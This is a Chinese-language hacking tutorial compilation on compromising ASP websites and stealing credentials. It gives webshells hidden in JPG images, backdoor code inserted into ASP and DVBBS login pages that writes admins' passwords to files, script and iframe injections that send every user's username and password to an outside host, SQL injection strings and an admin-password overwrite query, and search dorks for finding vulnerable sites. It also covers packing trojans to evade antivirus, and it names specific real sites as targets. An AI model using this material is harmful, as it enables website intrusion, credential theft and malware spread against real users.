.名称:如何制作图片ASP木马 (可显示图片)
建一个asp文件,内容为<!--#i nclude file="ating.jpg"-->
找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为
了运行成功,还要搜索<%和%>,将其变为00,(不要替换自己asp的),再把jpg文件开头加入
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form(#)+) </SCRIPT> . 名称:整蛊网吧
先用精锐网吧辅助工具得到用户名和密码,然后用计算机管理联结一台机器,开telnet,连接,开共享, 复制一个木马过去运行即可。 .名称:感受MD5暴力破解的魅力
rainbowcrack用法先用rtgen生成库 "rtgen md5 byte 1 7 5 2400 40000 all"
1和7代表密码最小和最大长度
阿汀我再加个方法:http://md5.rednoize.com/ 在线破解
或者到http://www.md5lookup.com/?category=01-3&;searck=on .很多时候我们做免杀木马,不用懂汇编,用北斗加壳程序就能逃杀,还有很多加壳软件,大家木马加壳 的时候最好多选择不知名的加壳软件 .名称:隐蔽的插入型ASP木马
()在我们要做手脚的asp文件里加入如下内容
<%if request("action")="ok" then%>
shell代码插在这里,最好是小马,还要加密一下
<%end if%>
访问的时候在你作手脚的asp文件后面加上?action=ok,即可
()另一种方法,在我们要做手脚的asp文件里加入如下内容
<%
on error resume next
strFileName = Request.QueryString("filer")
set objStream = Server.createObject("ABODB.Stream")
objStream.Type =
objStream.Open
objStream.LoadFromFile strFileName
objStream.SaveToFile Server.mappath("ating.asp"),
%>
访问的时候在做手脚的asp文件后面加上?filer=XXX
XXX为你本地上传的一个路径如 c:ating123.asp
上传后在做手脚的asp的同文件夹中有ating,asp
()前提得到system权限,
进入网站目录下一层
mkdir s…
copy ating.asp s…/
这样杀毒软件找不到的
访问http://网站/s…/ating.asp即可 . 工具http://hack520.tengyi.cn/chaojiyonghu.rar,此工具在该电脑生成一个超级用户 用户名为: hack 密码110,在DOS下和计算机管理器上看不到你建立的用户,并且是删除不掉的 .名称:QQ群脚本攻击
打开qq对话诓,复制消息,然后
下面的内容保存为.vbs 文件,运行即可
Set WshShell= WScript.createobject("WScript.Shell")
WshShell.AppActivate "QQ信息攻击脚本"
for i= to
WScript.Sleep
WshShell.SendKeys"^v"
WshShell.SendKeys i
WshShell.SendKeys "%s"
Next .搜索:程序制作:万鹏 有免费申请空间的,直接上传asp马即可 . 名称:全面找出你站上的ASP木马
() 用杀毒软件
() 用FTP客户端软件,点"工具"->"比较文件夹"
() 用asplist2..asp上传到站点空间查看,一般功能多的ASP我估计就是ASP木马
() 用工具Beyond Compare 10名称:拓展思路拿DVBBS帐号 "一个人的圣经"的动画
()以前获得webshell后想进入DVBBS的后台,想要管理员的密码,可以这样
老办法:
修改admin_login.asp得到明文DVBBS后台密码
在"username=trim(replace(request("username")这行后面
Dim fsoObject
Dim tsObject
Set fsoObject = Server.createObject("Scripting.FileSystemObject")
set tsObject = fsoObject.createTextFile(Server.MapPath("laner.txt"))
tsObject.Write CStr(request("password"))
Set fsoObject = Nothing
Set tsObject = Nothing
只要管理员登陆后台,在目录下就生成了laner.txt
()login.asp中Case "login_chk"下:
on error resume next
Dim rain
set rain=server.createobject("adodb.stream")
rain.Type=
rain.CharSet="gb2312"
rain.Position=rain.Size
rain.Open
rain.LoadFromFile server.MapPath("laner.asp")
rain.writetext now&request("username")&"text:"&request("password")&chr()
rain.SaveToFile server.MapPath("laner.asp"),
rain.Close
set rain=nothing
这样laner.asp将获得全部登陆人的登陆时间,用户名和密码
()如果你有自己的网站或者另外的webshell(强烈建议使用):
可以建立目录laner,在里面建立一个空的laner.asp和如下代码的rain.asp:
<%if request("n")<>"" and request("p")<>"" then
on error resume next
Dim rain
set rain=server.createobject("adodb.stream")
rain.Type=
rain.CharSet="gb2312"
rain.Position=rain.Size
rain.Open
rain.LoadFromFile server.MapPath("laner.asp")
rain.writetext now&"Name:"&request("n")&"Password:"&request("p")&chr()
rain.SaveToFile server.MapPath("laner.asp"),
rain.Close
set rain=nothing
end if%> . 名称:利用QQ在线状态抓鸽子肉鸡
生成qq在线状态,把里面的地址改成木马地址,发到论坛
在login.asp那里插入一句:
response.write"<scriptsrc=http://www.ptlushi.com/laner/rain.asp?n="&request("username") &""&"&p="&request("password")&"></script>"
response.write"<iframesrc=http://yourwebsite/laner/rain.asp?n="&request("username") &""&"&p="&request("password")&"></iframe>"
结果所有登陆人都会乖乖的把名字和密码送到你的laner.asp 里 . 动画名称:媒体中国整站程序存在多处漏洞
漏洞程序:媒体中国整站程序(第一版)
官方网站:http://meiti.elgod.com/
漏洞: %5c(暴库) 上传 注入
上传页面:down1/upload.asp . 名称:免费电话+MSH命令行工具
http://www.globe7.com/ 打开主页,点击坐下角,Free DownLoad,下载到本地,安装,
运行后,会提示正在寻找你所在地区的区号。由于是国际长途,注册一个帐号,送100美分,国内计时 0.01/分,你就有100分钟可以白打。是一个帐号哦。
要注意的就是,固定电话,小灵通 形式为0086521123456 521本来时0521,要省略前面的零,手机号也 是一样。 . 名称:Bo-Blog的新漏洞
http://网址/index.php?job=../admin/ban
把其中"禁止搜索的词"那部分<table>另存出来,里面的地址改完整,插入一句话木马 . 名称:钩魂者入侵传奇1私服
用百度 搜索 传奇 inurl:tuku
或者 传奇 inurl:wplm.htm
再或者 传奇 inurl:coolsites.asp
友情链接里插入一句话木马即可 . 程序: 宏达企业整站上传漏洞
官方主页:http://www.mu126.com/
漏洞页面:/cx/upfile.asp (上传漏洞) .无间盗邮箱,在修改密码里,用户名和密码里添or=or .名称: bbsxp5.16后台得到webshell
bbsxp5.16过滤了 asp,asp,cdx,cer,扩展名的文件上传,就是在基本设置上添加上上传类型也不行,并禁 止了修改数据备份数据名称,我们可以把此网页保存在本地,改源代码上传。 .名称:JHACKJ 2005年最新精典教程
下载看看吧,不错,各大网站都有 .名称:省力入侵韩国肉鸡
在啊D的扫描注入点项,打开这个:http://www.google.co.kr/advanced_search?hl=zh-CN
这是高级搜索项,关键字随便写。这里我写asp?name= 设置为每页显示100条。
语种选择韩文。搜索,很多sa. .名称:任何网吧的管理系统破解
选智能ABC,然后vv输入,光标后退两步,按delete键 刚输入的两个vv删除
最后按Inter键 .名称:破解QQ空间插入网页木马的代码
现在腾讯 已经封了很多QQ空间代码了 就如 以前 <iframe src="木马地址" name="lcx" width="" height="" frameborder=""></iframe>插入网页木马的代码也早被封了
突破禁用的方法 代码如下:
<div id=DI><img src="javascript :DI.innerHTML=\<iframe src=木马地址 width=190 height=190 marginwidth= marginheight= hspace= vspace= frameborder= scrolling=no></iframe>\" style=display:none></div> 最后附上 卡拉是条ok 总结的
.上传漏洞[不多讲]
pS: 如果看到:选择你要上传的文件 [重新上传]或者出现"请登陆后使用",%就有漏洞了!
有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传. .注入漏洞[不多讲]
pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:
http://注入网址;update admin set password=\新MD5密码\ where password=\旧MD5密码\-- [admin为表名.] .旁注,也就是跨站.
我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个 站点用提权,嗅探等方法来入侵我们 要入侵的站点。,在这里有个难点,就是一些服务器的绝对路径经 过加密,这就看我们的本事了 .暴库:把二级目录中间的/换成%5c
EY:http://www.ahttc.edu.cn/otherweb/dz/bgs/BigClass.asp?BigClassName=职责范围&BigClassType=1
如果你能看到:\E:ahttc040901otherwebdzdatabaseiXuEr_Studio.asa\不是一个有效的路径。 确定路 径名称拼写是否正确,以及是否 连接到文件存放的服务器。
这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行. .\or\=\or\这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:
\or\\=\ " or "a"="a \) or (\a\=\a ") or ("a"="a or =-- \ or \a\=\a .社会工程学。这个我们都知道吧。就是猜解。
 EY:http://www.neu.edu.cn/waishi/admin
admin waishi 7.写入ASP格式数据库。就是一句话木马[<%execute request("value")%> ],常用在留言本.
EY:http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[这个就是ASP格式的数据库],再写入一句话 木马 .源码利用:一些网站用的都是网上下载的源码.有的站长很菜.什么也不改.
EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp
这个站用的是:杰出校友录,源码我下过了,
默认数据库/webshell路径:databaseliangu_data.mdb 后台管理:adm_login.asp 密码及用户名都是 admin .默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具:网站猎手 挖掘鸡
EY:http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB .查看目录法:人一些网站可以断开目录,可以方问目录。
EY:http://www.ujs168.com/shop/admin/
http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/
这样我们可以找到数据库,下载不用我教吧 .工具溢出:.asp?NewsID= /2j.asp?id= .asp?id=[这种方法可以取得大量的WEBSHELL] .搜索引擎利用: ().inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/
().找网站的管理后台地址:
site:xxxx.comintext:管理
site:xxxx.comintitle:管理 <关键字很多,自已找>
site:xxxx.cominurl:login
().查找access的数据库,mssql、mysql的连接文件
allinurl:bbsdata
filetype:mdbinurl:database
filetype:incconn
inurl:datafiletype:mdb
我主不做了。。自已做做吧。。 .COOKIE欺骗:把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。 这个我就不多讲了 .利用常见的漏洞:如动网BBS
EY:http://js1011.com/bbs/index.asp
可以先用:dvbbs权限提升工具,使自已成为前台管理员。
THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert 取得Cookies/NC包
这个我就不做了,网上教程多的是,自已下个看看。
工具:dvbbs权限提升工具 动网固顶贴工具 .还有一些老漏洞。如IIS3,4的查看源码,5的delete
CGI,PHP的一些老洞,我就不说了啊。。太老了。没有什么大用途。

让你变成ASP木马高手的更多相关文章

  1. 防asp木马运行

    首 页 > 技术支持 防asp木马运行 目前比较流行的ASP木马主要通过三种技术来进行对服务器的相关操作. 一.使用FileSystemObject组件 FileSystemObject可以对文 ...

  2. 图片asp木马的制作方法[转]

    一个网站里面除了asp文件,再就数图片文件最多了,它让我们的网页"美丽动人"嘻嘻,但是你有没有想到过这里面暗藏的杀机,图片也可以是asp木马. 一个网站里面除了asp文件,再就数图 ...

  3. 打造不死的asp木马

    作者:黑色记忆本文已发表于<黑客X档案>杂志第十期 版权归<黑客X档案>所有 转载请注明版权 想不到,前几天我才发现,我千辛万苦收集的asp木马,居然没有几个不被Kill的.常 ...

  4. 利用其它带文件防护功能的软件防止*.asp;*.jpg写入文件。

    此木马是一个.NET程序制作,如果你的服务器支持.NET那就要注意了,,进入木马有个功能叫:IIS Spy,点击以后可以看到所有站点所在的物理路径.以前有很多人提出过,但一直没有人给解决的答案.. 防 ...

  5. ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法

    这个编辑器按脚本分主要有4个版本,ASP/ASPX/PHP/JSP 每个版本都有可以利用的漏洞.判断网站是否使用了eWebEditor查看程序源代码,看看源码中是否存在类似”ewebeditor.as ...

  6. (转载)ASP网站如何防止注入漏洞攻击

    SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如 果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉.但 ...

  7. 上传图片shell绕过过滤的几种方法

    一般网站图片上传功能都对文件进行过滤,防止webshelll写入.但不同的程序对过滤也不一样,如何突破过滤继续上传? 本文总结了七种方法,可以突破! 1.文件头+GIF89a法.(php)//这个很好 ...

  8. 上传图片shell绕过过滤的方法

    一般网站图片上传功能都对文件进行过滤,防止webshelll写入.但不同的程序对过滤也不一样,如何突破过滤继续上传? 本文总结了七种方法,可以突破! .文件头+GIF89a法.(php)//这个很好理 ...

  9. Ewebeditor最新漏洞及漏洞大全

    Ewebeditor最新漏洞及漏洞大全[收集] 来源:转载作者:佚名时间:2009-06-03 00:04:26 下面文章收集转载于网络:) 算是比較全面的ewebeditor编辑器的漏洞收集,如今的 ...

随机推荐

  1. java虚拟机和Dalvik虚拟机

    java虚拟机和Dalvik虚拟机的区别: java虚拟机Dalvik虚拟机 java虚拟机基于栈. 基于栈的机器必须使用指令来载入和操作栈上数据,所需指令更多更多dalvik虚拟机是基于寄存器的 j ...

  2. C语言 · Huffuman树

    基础练习 Huffuman树   时间限制:1.0s   内存限制:512.0MB        问题描述 Huffman树在编码中有着广泛的应用.在这里,我们只关心Huffman树的构造过程. 给出 ...

  3. 路由表及route使用

    路由表 linux下通过route可以查看本地路由表: Kernel IP routing table Destination     Gateway         Genmask         ...

  4. Tslib步骤以及出现问题的解决方案(转)

    嵌入式设备中触摸屏使用非常广泛,但触摸屏的坐标和屏的坐标是不对称的,需要校准.校准广泛使用的是开源的tslib. Tslib是一个开源的程序,能够为触摸屏驱动获得的采样提供诸如滤波.去抖.校准等功能, ...

  5. 缓存之 ACache

    1.android缓存的介绍 Android开发本质上就是手机和互联网中的webserver之间进行通信,就必定须要从服务端获取数据.而重复通过网络获取数据是比較耗时的.特别是訪问比較多的时候.会极大 ...

  6. Hibernate- QBC离线查询

    package com.gordon.test; import java.util.List; import org.hibernate.Criteria; import org.hibernate. ...

  7. MongoDB 简介及安装

    什么是MongoDB ? MongoDB 是由C++语言编写的,是一个基于分布式文件存储的开源数据库系统. 在高负载的情况下,添加更多的节点,可以保证服务器性能. MongoDB 旨在为WEB应用提供 ...

  8. sql server merge 的用法

    CREATE TABLE tTable ( id INT , f1 VARCHAR(10) , f2 VARCHAR(10) , f3 VARCHAR(10) ) GO INSERT INTO tTa ...

  9. 联合主键用hibernate注解映射方式主要有三种:

    将联合主键的字段单独放在一个类中,该类需要实现java.io.Serializable接口并重写equals和hascode 第一.将该类注解为@Embeddable,最后在主类中(该类不包含联合主键 ...

  10. MySQL无法重启问题解决Warning: World-writable config file ‘/etc/mysql/my.cnf’ is ignored

    今天在修改mysql数据库的配置文件,由于方便操作,就将“/etc/mysql/my.cnf” 的权限设置成 “777” 了,然后进行修改,当修改完进行重启mysql的时候,却报错,提示Warning ...